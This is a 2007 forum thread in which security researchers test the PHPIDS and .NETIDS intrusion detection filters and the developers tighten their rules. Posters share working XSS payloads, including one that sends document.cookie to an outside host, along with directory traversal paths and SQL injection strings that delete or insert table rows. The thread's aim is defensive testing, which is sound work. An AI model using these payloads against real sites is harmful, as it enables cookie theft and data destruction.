Yeah I tryed that one out also typing around my ASCII pad ^^, but if you mix it with nulls or > < it will. I guess they allow such chars because of locales cause every language should be able to use this thing.

@Ronald & Hong: Yes - exactly. But - do you see any problems in not detection vwe? I don't yet but maybe i miss the forest for the trees.

Thanks!
.mario

http://phpids.heideri.ch/?test=test1%20/%3Etest%3Ca%3E%20I%20have%20escaped!%20%3Ca%20href=%22backin%22

I don't know if this counts or not - it escapes the a href no quotes - which is definitely malicious input although not of a high severity.

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

@Martin: Thanks a lot! Modified the rules...

http://phpids.heideri.ch/?test=test1%20/%3Etest%3Ca%3E%20I%20have%20escaped!%20%3Ca%20href=%22backin%22

Greetings,
.mario

@.mario - it's still escapable via http://phpids.heideri.ch/?test=%3Etest%3C/a%3E%20ESCAPED%20AGAIN!!!!

I'm not sure how this can be detected really, unless you disallow >, but this is essentially allowing a malicious individual to write their content onto the page - ie. could forge a link to "login".

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

@Martin: Well - I think it would create tons of false positives to detect the single occurence of the greater-than-character - also you can just escape when the surrounding HTML is really bad . Furhtermore you could inject anything active/executable without being noticed so i guess it makes sense to just leave the filter as it is in this case.

Maybe it would make sense to detect character sequences like >[\s\w]</\w> - so you could make sure it it really an attempt to close an open tag/escape an attribute.

What do you think?



Edited 1 time(s). Last edit at 05/24/2007 09:57AM by .mario.

@.mario - firstly, I apologise for those !!!!s after the URL - they were meant to be part of it hehe.

I agree that catching > will generate too many false positives. Maybe this is one that will just have to be let go - I mean you can write a new attribute simply by putting a space after some text in the a href no quotes.

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

@Martin - no problem - I can live with the !!!s ;)

Let's conclude that good protection can only result of a minimum of code quality - which is definitely not given with pseudo HTML lacking attribute delimiters etc. - and as mentioned even if someone would manage to break out undetected the code afterwards would be detected for sure.

Thanks for your input!

Greetings,
.mario

Hi!

@Martin: I think I found a way to filter the above mentioned input without creating too much false alerts.

@all: I just updated the filter rules and the smoke test - now the PHP IDS should be capable to detect all possible fullwidth/halfwidth encoding attacks - also I improved the performance of the regex rules and changed some minor details with the impact of some rules (SQLi detection got a 5, detection of attributes in closed tags got a three)

We are straight heading towards the first public release - currently I am working in our intranet structure together with some group members and try to create a page design including logo etc.

We'll soon have the beta of the PHP IDS running on three high traffic platforms (formerly one) and expect another increase of quality due to the information we'll hopefully get.

I'll keep you informed about the state of the IDS - thank for all the testing and the input!
(and please keep testing like hell *g* )

Greetings!
.mario


<edit> next post is no. 100 in this thread - go get it! ;) </edit>



Edited 1 time(s). Last edit at 05/24/2007 10:57AM by .mario.

100th post!

j/k..

@.mario - I haven't had a chance to take a look at the updated instructions. Been busy at work. But I'm hoping this weekend will give me a chance to put the ids on the beta site I set up. If all goes well there, I'll deploy it on other sites I have, including http://www.createasmilefoundation.org which already has over 36000 hits, so it'd be a nice site to test it's sturdyness.

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

What about detecting directory traversals (../) which could be useful when trying to avoid LFI vulnerabilities?

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

@thrill: Congrats for the 100th post! ;) Regrading your applications: Nice! I am looking forward for that - if you need support just drop me or christ1an a line via PM/mail or the google group - I should be online whole weekend although not that frequently 'cause I'm gonna visit my family.

@Martin: A basic check for DT is already included - give it a try!

Greetings!
.mario

@.mario - I tried http://phpids.heideri.ch/?test=/../thisfile and it triggered no warnings that this was dangerous input... is that what you meant?

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

@Martin: Yes

http://phpids.heideri.ch/?test=/../../thisfile

That works and worked - your's will work tomorrow ;)
Thanx!

http://phpids.heideri.ch/?test=\..\..\..\thisfile

Phew - couldn't get my hands off. Now even obfuscated directory traversal (using unicode, hex-entities, etc.) should be detected.

Good n8!
.mario

p.s. @bedford: damn - i forgot windows ;)



Edited 1 time(s). Last edit at 05/24/2007 05:01PM by .mario.

hxxp://phpids.heideri.ch/?test=%23%22+onclick%60=%22window.location='ht'%2b'tp://google.com/?'%2bdocument.cookie

Affects
Firefox 2.x < 2.0.0.2
Firefox 1.5x < 1.5.10

:P

@beford: wow - impressive. thx!

FIXED

I've done the initial work on a port to .NET (c#). Work is at http://code.google.com/p/dotnetids/

Missing:

Complete XMLDOC comments
Some IEnumerable implementations

Still, it works, here's a test page using it:

IDS.IDS ids = new IDS.IDS(Request.QueryString);
ids.Run();

Label1.Text = "Total Impact: " + ids.Report.Impact.ToString();

foreach (IDS.Event ev in ids.Report.Events)
{
Label2.Text = "Param " + ev.Name + " failed " + ev.Filters.Count + " filters:<br/><br/>";

foreach (Filter f in ev.Filters)
{
Label2.Text += "Filter: " + f.Description + "<br/>";
Label2.Text += "Rule: " + Server.HtmlEncode(f.Rule) + "<br/>";
Label2.Text += "Impact: " + f.Impact.ToString() + "<br/><br/>";
}

}

I'm away for the next week but will do some more on it when I'm back - and after celebrating my birthday - which is tomorrow!

Have fun all!

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

beford's vector is still not fixed

hxxp://phpids.heideri.ch/?test=%23%22+onclick%60=%22location='ht'%2b'tp://google.com/?'%2bdocument.cookie

onWAHTEVER.=
may be a better way to go.

There should not be only a . after
onWAHTEVER (xxtp://phpids.heideri.ch/?test=%23%22+onclick%60=%22location='ht'%2b'tp://google.com/?'%2bdocument.cookie
also works)

I guess we will need to enumerate all such characters that work.

Do u know the list beford?

Web Application Security Journ(ey)al

http://www.mozilla.org/security/announce/2007/mfsa2007-02.html
http://ha.ckers.org/xss.html#XSS_Non_alpha_non_digit2

You probably want to filter out document.location, top.location, self.location



Edited 1 time(s). Last edit at 05/29/2007 03:04AM by beford.

Hi!

Thanks guys - FIXED!

http://phpids.heideri.ch/?test=%23%22+onclick%60=%22location='ht'%2b'tp://google.com/?'%2bdocument.cookie

I will lock myself in the next days and optimize the SQL injection detection - there's still plenty of work to do...

Greetings,
.mario

We have enhanced the SQL Injection detection vectors again. I would appreciate if anyone would try to inject malicious code.

http://phpids.heideri.ch/?test=xxx

Thanks!

Regards,
- http://christ1an.blogspot.com

_______________________
[[url=http://php-ids.org]php-ids.org[/url]] Web Application Security 2.0

This will pass: 1 AND(DELETE FROM LOGIN)

Integer SQL injection, which deletes table, or inserts.

is exploitable like this:

# weak query int SQL injection.
$sql = "SELECT * FROM LOGIN WHERE id = $_POST['id'] ";

# exploit result
$sql = "SELECT * FROM LOGIN WHERE id = 1 AND(DELETE FROM LOGIN) "; // pow!

And a few theoretical ones:

1' \x0 AND(INSERT INTO LOGIN SET USER = CONCAT(CHAR(39),CHAR(07),CHAR(39)) '

1' \x0 AND(INSERT INTO LOGIN SET USER = 0x00000 )

Hi Ronald!

Thanks a lot - I will update the filter ASAP...

<edit>
FIXED
...and btw - the URL for the smoketest finally changed
http://demo.phpids.org/?test=1'%20\x0%20AND(INSERT%20INTO%20LOGIN%20SET%20USER%20=%200x00000%20)
</edit>

Grx,
.mario



Edited 2 time(s). Last edit at 06/04/2007 05:14AM by .mario.

I'm very keen to test this - while you tackle your server issues, is there (or would you like) a mirror?

Hi!

We're back - Trac and forum are still down but you can use page and downloads again. I guess by tomorrow the whole estate should be working again.

http://php-ids.org/

Thanks for your support!
.mario

Just a quick note about .NETIDS which I really want to share!

There is now support on the SmokeTest for detection of fragmented XSS attacks!

I posted full details at http://the-mice.co.uk/switch/index.php/archives/27

but a basic example can be found at:

http://www.the-mice.co.uk/SmokeTest/SmokeTest.aspx?param1=Hello%20&param2=this%20&param3=is%20a%20test!
and
http://www.the-mice.co.uk/SmokeTest/SmokeTest.aspx?param1=%3C&param2=script&param3=%3E

Please try and stress this feature and let me know if you break it!

Thanks,

Martin

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS